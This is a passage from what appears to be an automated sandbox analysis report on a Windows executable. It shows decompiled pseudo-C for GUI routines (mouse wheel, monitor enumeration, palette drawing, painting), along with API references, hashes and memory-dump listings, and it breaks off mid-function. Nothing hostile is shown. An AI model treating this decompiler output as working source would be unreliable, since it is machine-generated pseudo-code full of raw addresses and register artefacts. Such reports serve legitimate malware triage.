                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                        • API String ID: 1416857345-3736581797
                                                                        • Opcode ID: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction ID: 351a13b39c766bd10c055905373aadfc2257e8037effc2ac2d33f24fba4f34ad
                                                                        • Opcode Fuzzy Hash: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction Fuzzy Hash: E1118270A08345AFE700AF65CC82B26B798EF45750F204476BD44AF3C1D6B86C41D76A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004277C4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E004277C4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x496acb != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x496ab8 = E00427218(7, _t60,  *0x496ab8, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                        0x004277cd
                                                                        0x004277d0
                                                                        0x004277da
                                                                        0x0042780a
                                                                        0x00427810
                                                                        0x004278cc
                                                                        0x004278d4
                                                                        0x004278d4
                                                                        0x00427818
                                                                        0x0042781d
                                                                        0x00427828
                                                                        0x00427833
                                                                        0x00427838
                                                                        0x004278a1
                                                                        0x004278b9
                                                                        0x004278ca
                                                                        0x004278b5
                                                                        0x004278b5
                                                                        0x004278b5
                                                                        0x00000000
                                                                        0x004278a1
                                                                        0x00427844
                                                                        0x00427853
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00427865
                                                                        0x0042787d
                                                                        0x00427893
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00427899
                                                                        0x0042789b
                                                                        0x0042789b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042787d
                                                                        0x004277ee
                                                                        0x00427803
                                                                        0x00000000

                                                                        APIs
                                                                        • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004277FD
                                                                        • GetSystemMetrics.USER32 ref: 00427822
                                                                        • GetSystemMetrics.USER32 ref: 0042782D
                                                                        • GetClipBox.GDI32(?,?), ref: 0042783F
                                                                        • GetDCOrgEx.GDI32(?,?), ref: 0042784C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00427865
                                                                        • IntersectRect.USER32 ref: 00427876
                                                                        • IntersectRect.USER32 ref: 0042788C
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                        • String ID: EnumDisplayMonitors
                                                                        • API String ID: 362875416-2491903729
                                                                        • Opcode ID: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction ID: 95e6c646e184b3413f1b03aee9d1c08cd6eaa1e6872ea2d6174b8da1ddef65f3
                                                                        • Opcode Fuzzy Hash: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction Fuzzy Hash: 5D311E72E0421AAFDB10DFA5DC44AEF77BCAF05314F408537F915E2241E6389905CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004245C2, Relevance: 16.7, APIs: 11, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E004245C2(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x424810; // 0xf
				E00420804(_v8, __ecx, _t173);
				E00424C34(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L5:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L5;
					}
				}
				if(_t82 == 0) {
					if(E00424950(_t165) == 0) {
						SetStretchBltMode(E00420730(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x424801);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424BD4(_t165, _t166);
				}
				_t89 = E00424894(_t165);
				_t177 =  *0x424810; // 0xf
				E00420804(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424894(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E00424808);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x424796);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E00420B28(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420CCC( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424894(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4247db);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}


























                                                                        0x004245c2
                                                                        0x004245c5
                                                                        0x004245c7
                                                                        0x004245cd
                                                                        0x004245cf
                                                                        0x004245d2
                                                                        0x004245d4
                                                                        0x004245d7
                                                                        0x004245e0
                                                                        0x004245e7
                                                                        0x004245ee
                                                                        0x004245f1
                                                                        0x004245f5
                                                                        0x004245fa
                                                                        0x0042460b
                                                                        0x00424615
                                                                        0x0042461a
                                                                        0x0042461a
                                                                        0x0042462c
                                                                        0x00424636
                                                                        0x0042463b
                                                                        0x0042463f
                                                                        0x00424644
                                                                        0x00424655
                                                                        0x00424655
                                                                        0x00424646
                                                                        0x0042464a
                                                                        0x00424653
                                                                        0x00424659
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00424653
                                                                        0x0042465d
                                                                        0x004246a0
                                                                        0x004246ad
                                                                        0x004246ad
                                                                        0x0042465f
                                                                        0x0042466a
                                                                        0x00424678
                                                                        0x00424690
                                                                        0x00424690
                                                                        0x004246b4
                                                                        0x004246b5
                                                                        0x004246ba
                                                                        0x004246bd
                                                                        0x004246c9
                                                                        0x004246cd
                                                                        0x004246cd
                                                                        0x004246d4
                                                                        0x004246d9
                                                                        0x004246df
                                                                        0x004246ed
                                                                        0x004247d6
                                                                        0x004247dd
                                                                        0x004247e0
                                                                        0x004247e3
                                                                        0x004247ec
                                                                        0x00000000
                                                                        0x004247fb
                                                                        0x00424800
                                                                        0x004246f3
                                                                        0x004246f5
                                                                        0x004246fa
                                                                        0x004246ff
                                                                        0x00424700
                                                                        0x00424705
                                                                        0x00424708
                                                                        0x00424717
                                                                        0x00424727
                                                                        0x00424761
                                                                        0x00424766
                                                                        0x00424768
                                                                        0x0042476b
                                                                        0x0042476e
                                                                        0x00424777
                                                                        0x00424781
                                                                        0x00424781
                                                                        0x0042478a
                                                                        0x00000000
                                                                        0x00424790
                                                                        0x00424795
                                                                        0x00424795

                                                                        APIs
                                                                          • Part of subcall function 00424C34: GetDC.USER32(00000000), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: ReleaseDC.USER32 ref: 00424CD8
                                                                        • SelectPalette.GDI32(?,?,000000FF), ref: 00424606
                                                                        • RealizePalette.GDI32(?), ref: 00424615
                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 00424627
                                                                        • GetDeviceCaps.GDI32(?,0000000E), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsDevice$Palette$BrushCreateSelect$CompatibleHalftoneModeObjectRealizeReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2358456236-0
                                                                        • Opcode ID: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction ID: 8a5360052a613d484358f7dafbb41ff6efc4df6e6b80e8dfa515692f2bc59ea2
                                                                        • Opcode Fuzzy Hash: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction Fuzzy Hash: 37516CB5B00215AFCB10EFA9D885F5ABBF8EB49304F51846AF508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AE5C, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E0043AE5C(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E00439AB4(_t88) != 0) {
						_t38 = E0043A97C(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E0043CC2C(_t88),  &_v80);
					E00437760(_t88, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E0043AE5C(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x43afae, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E0043CC2C(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x43afb5);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                                                        0x0043ae5d
                                                                        0x0043ae5f
                                                                        0x0043ae64
                                                                        0x0043ae65
                                                                        0x0043ae67
                                                                        0x0043ae70
                                                                        0x0043ae7c
                                                                        0x0043ae9b
                                                                        0x0043ae89
                                                                        0x0043ae8f
                                                                        0x0043ae8f
                                                                        0x0043afbb
                                                                        0x0043aea5
                                                                        0x0043aeac
                                                                        0x0043aeb5
                                                                        0x0043aec3
                                                                        0x0043aed0
                                                                        0x0043aed6
                                                                        0x0043aee2
                                                                        0x0043aef2
                                                                        0x0043af00
                                                                        0x0043af0f
                                                                        0x0043af24
                                                                        0x0043af2c
                                                                        0x0043af33
                                                                        0x0043af3a
                                                                        0x0043af51
                                                                        0x0043af5f
                                                                        0x0043af6b
                                                                        0x0043af7c
                                                                        0x0043af83
                                                                        0x0043af86
                                                                        0x0043af89
                                                                        0x0043af96
                                                                        0x0043af9f
                                                                        0x0043afad
                                                                        0x0043afad

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0043AEA7
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043AECB
                                                                        • ReleaseDC.USER32 ref: 0043AED6
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0043AEDD
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AEED
                                                                        • BeginPaint.USER32(00000000,?,00000000,0043AFAE,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF0F
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043AF6B
                                                                        • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF7C
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AF96
                                                                        • DeleteDC.GDI32(00000000), ref: 0043AF9F
                                                                        • DeleteObject.GDI32(?), ref: 0043AFA8
                                                                          • Part of subcall function 0043A97C: BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                          • Part of subcall function 0043A97C: EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                        • String ID:
                                                                        • API String ID: 3867285559-0
                                                                        • Opcode ID: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction ID: 6c27e87496bbd68a0565411df090fbb30ca26b63d5b2c97abbe2d0871e1eec49
                                                                        • Opcode Fuzzy Hash: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction Fuzzy Hash: 11416A71B40204AFDB00EBA9CC85B9EB7F9EB4C704F10447AB50AEB281DA79AD15CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00443D4C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 55%
                                                                        			E00443D4C(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				int _t85;
				void* _t119;
				void* _t120;
				void* _t129;
				struct HDC__* _t138;
				struct HDC__* _t139;
				int _t140;
				void* _t141;

				_t121 = __ecx;
				_t137 = __ecx;
				_v8 = __edx;
				_t120 = __eax;
				_t46 = E00443514(__eax);
				if(_t46 != 0) {
					_t144 = _a4;
					if(_a4 == 0) {
						__eflags =  *(_t120 + 0x54);
						if( *(_t120 + 0x54) == 0) {
							_t140 = E004242CC(1);
							 *(_t120 + 0x54) = _t140;
							E004256E4(_t140, 1);
							 *((intOrPtr*)( *_t140 + 0x40))();
							_t121 =  *_t140;
							 *((intOrPtr*)( *_t140 + 0x34))();
						}
						E0041FC50( *((intOrPtr*)(E00424894( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
						E00412BCC( *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
						_push( &_v44);
						_t57 = E00424894( *(_t120 + 0x54));
						_pop(_t129);
						E004202E8(_t57, _t129);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420730(E00424894( *(_t120 + 0x54))));
						_push(_v8);
						_push(E004436E8(_t120));
						L00426AE8();
						E00412BCC(_a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
						_v12 = E00420730(E00424894( *(_t120 + 0x54)));
						E0041FC50( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000014, _t137, _t141, __eflags);
						_t138 = E00420730(_t137);
						SetTextColor(_t138, 0xffffff);
						SetBkColor(_t138, 0);
						_t85 = _a16 + 1;
						__eflags = _t85;
						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
						E0041FC50( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000010, _t137, _t141, _t85);
						_t139 = E00420730(_t137);
						SetTextColor(_t139, 0xffffff);
						SetBkColor(_t139, 0);
						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
					}
					_push(_a8);
					_push(E00443310(_t144));
					E00443D24(_t120, _t144);
					_push(E00443310(_t144));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00420730(__ecx));
					_push(_v8);
					_t119 = E004436E8(_t120);
					_push(_t119);
					L00426AE8();
					return _t119;
				}
				return _t46;
			}



















                                                                        0x00443d4c
                                                                        0x00443d55
                                                                        0x00443d57
                                                                        0x00443d5a
                                                                        0x00443d5e
                                                                        0x00443d65
                                                                        0x00443d6b
                                                                        0x00443d6f
                                                                        0x00443db5
                                                                        0x00443db9
                                                                        0x00443dc7
                                                                        0x00443dc9
                                                                        0x00443dd0
                                                                        0x00443ddc
                                                                        0x00443de4
                                                                        0x00443de6
                                                                        0x00443de6
                                                                        0x00443df9
                                                                        0x00443e0d
                                                                        0x00443e15
                                                                        0x00443e19
                                                                        0x00443e1e
                                                                        0x00443e1f
                                                                        0x00443e24
                                                                        0x00443e26
                                                                        0x00443e28
                                                                        0x00443e2a
                                                                        0x00443e2c
                                                                        0x00443e2e
                                                                        0x00443e30
                                                                        0x00443e3f
                                                                        0x00443e43
                                                                        0x00443e4b
                                                                        0x00443e4c
                                                                        0x00443e68
                                                                        0x00443e7a
                                                                        0x00443e85
                                                                        0x00443e91
                                                                        0x00443e99
                                                                        0x00443ea1
                                                                        0x00443ec3
                                                                        0x00443ec3
                                                                        0x00443ec6
                                                                        0x00443ed3
                                                                        0x00443edf
                                                                        0x00443ee7
                                                                        0x00443eef
                                                                        0x00000000
                                                                        0x00443f12
                                                                        0x00443d74
                                                                        0x00443d7d
                                                                        0x00443d80
                                                                        0x00443d8a
                                                                        0x00443d8b
                                                                        0x00443d8d
                                                                        0x00443d92
                                                                        0x00443d96
                                                                        0x00443d9e
                                                                        0x00443da2
                                                                        0x00443da5
                                                                        0x00443daa
                                                                        0x00443dab
                                                                        0x00000000
                                                                        0x00443dab
                                                                        0x00443f1d

                                                                        APIs
                                                                        • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00443DAB
                                                                        • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00443E4C
                                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00443E99
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00443EA1
                                                                        • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00443EC6
                                                                          • Part of subcall function 00443D24: 73452240.COMCTL32(00000000,?,00443D85,00000000,?), ref: 00443D3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73452430Color$73452240Text
                                                                        • String ID: DA
                                                                        • API String ID: 3810274889-2080325668
                                                                        • Opcode ID: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction ID: b45212fec9e8cfc054dcf64ae06490e4be8bfbe9f25bbab4dce699ee82f4dead
                                                                        • Opcode Fuzzy Hash: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction Fuzzy Hash: C6514F71700115AFDB40EF69DD82F9E37ECAF48714F50016AB904EB382CA78ED558B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AAD8, Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043AAD8(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00414208( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EFA4(0x80000010));
							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EFA4(0x80000014));
							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414264(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00414208( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412BCC( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E00434EE8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
